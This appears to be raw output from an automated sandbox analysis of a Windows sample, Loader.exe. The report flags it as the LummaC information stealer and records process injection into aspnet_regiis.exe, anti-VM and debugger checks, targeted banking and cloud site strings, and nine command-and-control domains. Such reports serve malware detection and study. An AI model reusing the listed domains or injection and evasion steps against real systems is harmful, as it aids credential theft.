              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03399F9C3_2_03399F9C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B6F823_2_033B6F82
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C4F803_2_033C4F80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D1F803_2_033D1F80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BB7FE3_2_033BB7FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BB7D93_2_033BB7D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B762D3_2_033B762D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A6E103_2_033A6E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BBE103_2_033BBE10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B2E503_2_033B2E50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BD6423_2_033BD642
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B26A03_2_033B26A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C86FE3_2_033C86FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AF5103_2_033AF510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B9D003_2_033B9D00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339BD703_2_0339BD70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C35B03_2_033C35B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03398DA03_2_03398DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B55A43_2_033B55A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C2D803_2_033C2D80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339ADD03_2_0339ADD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033CEC203_2_033CEC20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BAC043_2_033BAC04
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C4C603_2_033C4C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D4C503_2_033D4C50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033994BF3_2_033994BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B94943_2_033B9494
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AECDE3_2_033AECDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B7CD23_2_033B7CD2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339ECC03_2_0339ECC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E4F8610 appears 33 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E5266A0 appears 87 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E516CC0 appears 65 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0339C8C0 appears 71 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 033AC2A0 appears 176 times
              Source: Loader.exe, 00000000.00000002.2133612238.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Loader.exe
              Source: Loader.exeBinary or memory string: OriginalFilenameNathanOliviaChloe.YpP vs Loader.exe
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@1/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C3950 CoCreateInstance,3_2_033C3950
              Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_regiis.exe, 00000003.00000003.2169111393.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2154923285.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168913374.0000000005B27000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2154642914.0000000005B28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Loader.exeReversingLabs: Detection: 42%
              Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: Loader.exe, -Module-.cs.Net Code: _200D_200B_200E_202A_206A_206C_200F_206D_200E_206A_206A_202E_200D_202B_206A_206F_202A_202C_206A_202B_200E_206A_202B_200E_202E_202A_202E_202E_202D_206D_200D_206C_202C_200B_206D_202D_200B_206E_200B_202C_202E System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E503804 push ecx; ret 0_2_6E503817
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3866 push 00000035h; retf 0_2_00DA3869
              Source: Loader.exeStatic PE information: section name: .text entropy: 7.856893494807448
              Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 4560, type: MEMORYSTR
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: DA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 5170000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 6170000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 62A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 72A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 7630000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 8630000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exe TID: 6484Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 5972Thread sleep time: -90000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4FCB0B FindFirstFileExW,0_2_6E4FCB0B
              Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: aspnet_regiis.exe, 00000003.00000003.2169054454.0000000005B5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.0000000003677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gFHNSRWNQuMfmd1lSKnRfXzO/vNgRSts+PyOlZzV7C6fEuIETcpVqEmungkL/9As]
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D0D90 LdrInitializeThunk,3_2_033D0D90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4FC45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4FC45A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4FE22F GetProcessHeap,0_2_6E4FE22F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F7FC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E4F7FC1
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4FC45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4FC45A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F849A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E4F849A
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: Loader.exeString found in binary or memory: opposezmny.site
              Source: Loader.exeString found in binary or memory: seallysl.site
              Source: Loader.exeString found in binary or memory: mafnufacut.cyou
              Source: Loader.exeString found in binary or memory: faulteyotk.site
              Source: Loader.exeString found in binary or memory: dilemmadu.site
              Source: Loader.exeString found in binary or memory: contemteny.site
              Source: Loader.exeString found in binary or memory: goalyfeastz.site
              Source: Loader.exeString found in binary or memory: servicedny.site
              Source: Loader.exeString found in binary or memory: authorisev.site
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3391000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D6000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D9000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33E9000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3391000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D6000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D9000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33E9000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3130008Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F8658 cpuid 0_2_6E4F8658
              Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F80E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E4F80E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
